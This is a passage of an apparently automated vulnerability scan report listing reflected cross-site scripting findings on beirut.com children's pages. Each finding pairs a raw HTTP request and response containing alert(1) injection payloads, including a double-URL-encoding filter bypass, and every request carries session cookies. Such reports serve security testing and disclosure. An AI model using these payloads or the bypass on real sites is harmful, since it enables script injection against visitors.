Cookie: __utmz=52332730.1295922061.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/56; PHPSESSID=17jkapsd34tdtfv9m4mr30gs23; fbsetting_98034c63917cb0c0c02f1b9429eaa593=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utma=52332730.310658913.1295922061.1295922061.1295922061.1; __utmc=52332730; __utmb=52332730.1.10.1295922061; base_domain_98034c63917cb0c0c02f1b9429eaa593=beirut.com;

Response

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 08:03:51 GMT
Server: Apache/2.2.3 (CentOS)
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: private, no-cache, no-store, proxy-revalidate, no-transform
Pragma: no-cache
Vary: User-Agent,Accept,Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 60702

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/
...[SNIP]...
<script type="text/javascript">
var randstyle='green';
var indexpage='JustForKids28d50'-alert(1)-'2b48b6f7343';
var initfacebox='';
var contactid='';
var showfacebox='';
</script>
...[SNIP]...

4.546. http://www.beirut.com/JustForKids/Educational/9-service [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.beirut.com
Path:   /JustForKids/Educational/9-service

Issue detail

The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 426d9%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e7dd67e3cf0 was submitted in the REST URL parameter 3. This input was echoed as 426d9"><script>alert(1)</script>7dd67e3cf0 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Remediation detail

There is probably no need to perform a second URL-decode of the value of REST URL parameter 3 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /JustForKids/Educational/9-service426d9%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e7dd67e3cf0 HTTP/1.1
Host: www.beirut.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=52332730.1295922061.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/56; PHPSESSID=17jkapsd34tdtfv9m4mr30gs23; fbsetting_98034c63917cb0c0c02f1b9429eaa593=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utma=52332730.310658913.1295922061.1295922061.1295922061.1; __utmc=52332730; __utmb=52332730.1.10.1295922061; base_domain_98034c63917cb0c0c02f1b9429eaa593=beirut.com;

Response

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 08:11:26 GMT
Server: Apache/2.2.3 (CentOS)
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: private, no-cache, no-store, proxy-revalidate, no-transform
Pragma: no-cache
Vary: User-Agent,Accept,Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 54355

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/
...[SNIP]...
<a id="submitlisting_footer" rel="facebox" href="/submitaListing.php?randstyle=purple&indexpage=JustForKids&listingtype=justforkids.php&Types=9-service426d9"><script>alert(1)</script>7dd67e3cf0">
...[SNIP]...

4.547. http://www.beirut.com/JustForKids/Gatherings/14-event [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.beirut.com
Path:   /JustForKids/Gatherings/14-event

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload e1164'-alert(1)-'8498d5bb334 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /JustForKidse1164'-alert(1)-'8498d5bb334/Gatherings/14-event HTTP/1.1
Host: www.beirut.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=52332730.1295922061.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/56; PHPSESSID=17jkapsd34tdtfv9m4mr30gs23; fbsetting_98034c63917cb0c0c02f1b9429eaa593=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utma=52332730.310658913.1295922061.1295922061.1295922061.1; __utmc=52332730; __utmb=52332730.1.10.1295922061; base_domain_98034c63917cb0c0c02f1b9429eaa593=beirut.com;

Response

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 08:13:43 GMT
Server: Apache/2.2.3 (CentOS)
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: private, no-cache, no-store, proxy-revalidate, no-transform
Pragma: no-cache
Vary: User-Agent,Accept,Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 60709

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/
...[SNIP]...
<script type="text/javascript">
var randstyle='purple';
var indexpage='JustForKidse1164'-alert(1)-'8498d5bb334';
var initfacebox='';
var contactid='';
var showfacebox='';
</script>
...[SNIP]...

4.548. http://www.beirut.com/JustForKids/Gatherings/14-event [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.beirut.com
Path:   /JustForKids/Gatherings/14-event

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 13a67"><a>36c4cb2e963 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /JustForKids13a67"><a>36c4cb2e963/Gatherings/14-event HTTP/1.1
Host: www.beirut.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=52332730.1295922061.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/56; PHPSESSID=17jkapsd34tdtfv9m4mr30gs23; fbsetting_98034c63917cb0c0c02f1b9429eaa593=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utma=52332730.310658913.1295922061.1295922061.1295922061.1; __utmc=52332730; __utmb=52332730.1.10.1295922061; base_domain_98034c63917cb0c0c02f1b9429eaa593=beirut.com;

Response

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 08:04:51 GMT
Server: Apache/2.2.3 (CentOS)
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: private, no-cache, no-store, proxy-revalidate, no-transform
Pragma: no-cache
Vary: User-Agent,Accept,Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 60517

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/
...[SNIP]...
<input type="hidden" name="indexpage" id="indexpage" value="JustForKids13a67"><a>36c4cb2e963">
...[SNIP]...

4.549. http://www.beirut.com/JustForKids/Gatherings/14-event [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.beirut.com
Path:   /JustForKids/Gatherings/14-event

Issue detail

The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload df290%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e1d5624aa6d5 was submitted in the REST URL parameter 3. This input was echoed as df290"><script>alert(1)</script>1d5624aa6d5 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Remediation detail

There is probably no need to perform a second URL-decode of the value of REST URL parameter 3 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /JustForKids/Gatherings/14-eventdf290%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e1d5624aa6d5 HTTP/1.1
Host: www.beirut.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=52332730.1295922061.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/56; PHPSESSID=17jkapsd34tdtfv9m4mr30gs23; fbsetting_98034c63917cb0c0c02f1b9429eaa593=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utma=52332730.310658913.1295922061.1295922061.1295922061.1; __utmc=52332730; __utmb=52332730.1.10.1295922061; base_domain_98034c63917cb0c0c02f1b9429eaa593=beirut.com;

Response

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 08:23:37 GMT
Server: Apache/2.2.3 (CentOS)
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: private, no-cache, no-store, proxy-revalidate, no-transform
Pragma: no-cache
Vary: User-Agent,Accept,Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 54185

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/
...[SNIP]...
<a id="submitlisting_footer" rel="facebox" href="/submitaListing.php?randstyle=orange&indexpage=JustForKids&listingtype=justforkids.php&Types=14-eventdf290"><script>alert(1)</script>1d5624aa6d5">
...[SNIP]...

4.550. http://www.beirut.com/JustForKids/Recreation-and-Fun/11-locale [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.beirut.com
Path:   /JustForKids/Recreation-and-Fun/11-locale

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 973ad'-alert(1)-'ed30901e052 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /JustForKids973ad'-alert(1)-'ed30901e052/Recreation-and-Fun/11-locale HTTP/1.1
Host: www.beirut.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=52332730.1295922061.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/56; PHPSESSID=17jkapsd34tdtfv9m4mr30gs23; fbsetting_98034c63917cb0c0c02f1b9429eaa593=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utma=52332730.310658913.1295922061.1295922061.1295922061.1; __utmc=52332730; __utmb=52332730.1.10.1295922061; base_domain_98034c63917cb0c0c02f1b9429eaa593=beirut.com;

Response

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 08:23:33 GMT
Server: Apache/2.2.3 (CentOS)
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: private, no-cache, no-store, proxy-revalidate, no-transform
Pragma: no-cache
Vary: User-Agent,Accept,Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 60249

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/
...[SNIP]...
<script type="text/javascript">
var randstyle='orange';
var indexpage='JustForKids973ad'-alert(1)-'ed30901e052';
var initfacebox='';
var contactid='';
var showfacebox='';
</script>
...[SNIP]...

4.551. http://www.beirut.com/JustForKids/Recreation-and-Fun/11-locale [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.beirut.com
Path:   /JustForKids/Recreation-and-Fun/11-locale

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 867d5"><a>a2aa381f760 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /JustForKids867d5"><a>a2aa381f760/Recreation-and-Fun/11-locale HTTP/1.1
Host: www.beirut.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=52332730.1295922061.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/56; PHPSESSID=17jkapsd34tdtfv9m4mr30gs23; fbsetting_98034c63917cb0c0c02f1b9429eaa593=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utma=52332730.310658913.1295922061.1295922061.1295922061.1; __utmc=52332730; __utmb=52332730.1.10.1295922061; base_domain_98034c63917cb0c0c02f1b9429eaa593=beirut.com;

Response

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 08:16:12 GMT
Server: Apache/2.2.3 (CentOS)
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: private, no-cache, no-store, proxy-revalidate, no-transform
Pragma: no-cache
Vary: User-Agent,Accept,Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 60694

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/
...[SNIP]...
<input type="hidden" name="indexpage" id="indexpage" value="JustForKids867d5"><a>a2aa381f760">
...[SNIP]...

4.552. http://www.beirut.com/JustForKids/Recreation-and-Fun/11-locale [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.beirut.com
Path:   /JustForKids/Recreation-and-Fun/11-locale

Issue detail

The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 700f9%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e848ee228d11 was submitted in the REST URL parameter 3. This input was echoed as 700f9"><script>alert(1)</script>848ee228d11 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Remediation detail

There is probably no need to perform a second URL-decode of the value of REST URL parameter 3 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /JustForKids/Recreation-and-Fun/11-locale700f9%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e848ee228d11 HTTP/1.1
Host: www.beirut.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=52332730.1295922061.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/56; PHPSESSID=17jkapsd34tdtfv9m4mr30gs23; fbsetting_98034c63917cb0c0c02f1b9429eaa593=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utma=52332730.310658913.1295922061.1295922061.1295922061.1; __utmc=52332730; __utmb=52332730.1.10.1295922061; base_domain_98034c63917cb0c0c02f1b9429eaa593=beirut.com;

Response

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 08:29:36 GMT
Server: Apache/2.2.3 (CentOS)
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: private, no-cache, no-store, proxy-revalidate, no-transform
Pragma: no-cache
Vary: User-Agent,Accept,Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 54344

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/
...[SNIP]...
<a id="submitlisting_footer" rel="facebox" href="/submitaListing.php?randstyle=blue&indexpage=JustForKids&listingtype=justforkids.php&Types=11-locale700f9"><script>alert(1)</script>848ee228d11">
...[SNIP]...

4.553. http://www.beirut.com/JustForKids/Shops/8-locale [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.beirut.com
Path:   /JustForKids/Shops/8-locale

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 5b265"><a>ad10578e158 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /JustForKids5b265"><a>ad10578e158/Shops/8-locale HTTP/1.1
Host: www.beirut.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=52332730.1295922061.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/56; PHPSESSID=17jkapsd34tdtfv9m4mr30gs23; fbsetting_98034c63917cb0c0c02f1b9429eaa593=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utma=52332730.310658913.1295922061.1295922061.1295922061.1; __utmc=52332730; __utmb=52332730.1.10.1295922061; base_domain_98034c63917cb0c0c02f1b9429eaa593=beirut.com;

Response

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 08:16:33 GMT
Server: Apache/2.2.3 (CentOS)
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: private, no-cache, no-store, proxy-revalidate, no-transform
Pragma: no-cache
Vary: User-Agent,Accept,Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 60518

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/
...[SNIP]...
<input type="hidden" name="indexpage" id="indexpage" value="JustForKids5b265"><a>ad10578e158">
...[SNIP]...

4.554. http://www.beirut.com/JustForKids/Shops/8-locale [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.beirut.com
Path:   /JustForKids/Shops/8-locale

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload cde6d'-alert(1)-'4255c5d89e2 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /JustForKidscde6d'-alert(1)-'4255c5d89e2/Shops/8-locale HTTP/1.1
Host: www.beirut.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=52332730.1295922061.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/56; PHPSESSID=17jkapsd34tdtfv9m4mr30gs23; fbsetting_98034c63917cb0c0c02f1b9429eaa593=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utma=52332730.310658913.1295922061.1295922061.1295922061.1; __utmc=52332730; __utmb=52332730.1.10.1295922061; base_domain_98034c63917cb0c0c02f1b9429eaa593=beirut.com;

Response

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 08:23:30 GMT
Server: Apache/2.2.3 (CentOS)
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: private, no-cache, no-store, proxy-revalidate, no-transform
Pragma: no-cache
Vary: User-Agent,Accept,Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 60375

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/
...[SNIP]...
<script type="text/javascript">
var randstyle='orange';
var indexpage='JustForKidscde6d'-alert(1)-'4255c5d89e2';
var initfacebox='';
var contactid='';
var showfacebox='';
</script>
...[SNIP]...

4.555. http://www.beirut.com/JustForKids/Shops/8-locale [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.beirut.com
Path:   /JustForKids/Shops/8-locale

Issue detail

The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload fe0e2%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e3d4876ec01c was submitted in the REST URL parameter 3. This input was echoed as fe0e2"><script>alert(1)</script>3d4876ec01c in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Remediation detail

There is probably no need to perform a second URL-decode of the value of REST URL parameter 3 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /JustForKids/Shops/8-localefe0e2%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e3d4876ec01c HTTP/1.1
Host: www.beirut.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=52332730.1295922061.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/56; PHPSESSID=17jkapsd34tdtfv9m4mr30gs23; fbsetting_98034c63917cb0c0c02f1b9429eaa593=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utma=52332730.310658913.1295922061.1295922061.1295922061.1; __utmc=52332730; __utmb=52332730.1.10.1295922061; base_domain_98034c63917cb0c0c02f1b9429eaa593=beirut.com;

Response

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 08:29:38 GMT
Server: Apache/2.2.3 (CentOS)
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: private, no-cache, no-store, proxy-revalidate, no-transform
Pragma: no-cache
Vary: User-Agent,Accept,Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 54342

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/
...[SNIP]...
<a id="submitlisting_footer" rel="facebox" href="/submitaListing.php?randstyle=blue&indexpage=JustForKids&listingtype=justforkids.php&Types=8-localefe0e2"><script>alert(1)</script>3d4876ec01c">
...[SNIP]...

4.556. http://www.beirut.com/JustForKids/Sports/1-event [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.beirut.com
Path:   /JustForKids/Sports/1-event

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 3bdf7'-alert(1)-'128f90b41cd was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /JustForKids3bdf7'-alert(1)-'128f90b41cd/Sports/1-event HTTP/1.1
Host: www.beirut.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=52332730.1295922061.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/56; PHPSESSID=17jkapsd34tdtfv9m4mr30gs23; fbsetting_98034c63917cb0c0c02f1b9429eaa593=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utma=52332730.310658913.1295922061.1295922061.1295922061.1; __utmc=52332730; __utmb=52332730.1.10.1295922061; base_domain_98034c63917cb0c0c02f1b9429eaa593=beirut.com;

Response

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 08:23:59 GMT
Server: Apache/2.2.3 (CentOS)
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: private, no-cache, no-store, proxy-revalidate, no-transform
Pragma: no-cache
Vary: User-Agent,Accept,Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 60550

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/
...[SNIP]...
<script type="text/javascript">
var randstyle='magenta';
var indexpage='JustForKids3bdf7'-alert(1)-'128f90b41cd';
var initfacebox='';
var contactid='';
var showfacebox='';
</script>
...[SNIP]...

4.557. http://www.beirut.com/JustForKids/Sports/1-event [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.beirut.com
Path:   /JustForKids/Sports/1-event

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload bb9e0"><a>9dd7ca5e8d was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /JustForKidsbb9e0"><a>9dd7ca5e8d/Sports/1-event HTTP/1.1
Host: www.beirut.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=52332730.1295922061.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/56; PHPSESSID=17jkapsd34tdtfv9m4mr30gs23; fbsetting_98034c63917cb0c0c02f1b9429eaa593=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utma=52332730.310658913.1295922061.1295922061.1295922061.1; __utmc=52332730; __utmb=52332730.1.10.1295922061; base_domain_98034c63917cb0c0c02f1b9429eaa593=beirut.com;

Response

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 08:13:51 GMT
Server: Apache/2.2.3 (CentOS)
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: private, no-cache, no-store, proxy-revalidate, no-transform
Pragma: no-cache
Vary: User-Agent,Accept,Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 60478

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/
...[SNIP]...
<input type="hidden" name="indexpage" id="indexpage" value="JustForKidsbb9e0"><a>9dd7ca5e8d">
...[SNIP]...

4.558. http://www.beirut.com/JustForKids/Sports/1-event [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.beirut.com
Path:   /JustForKids/Sports/1-event

Issue detail

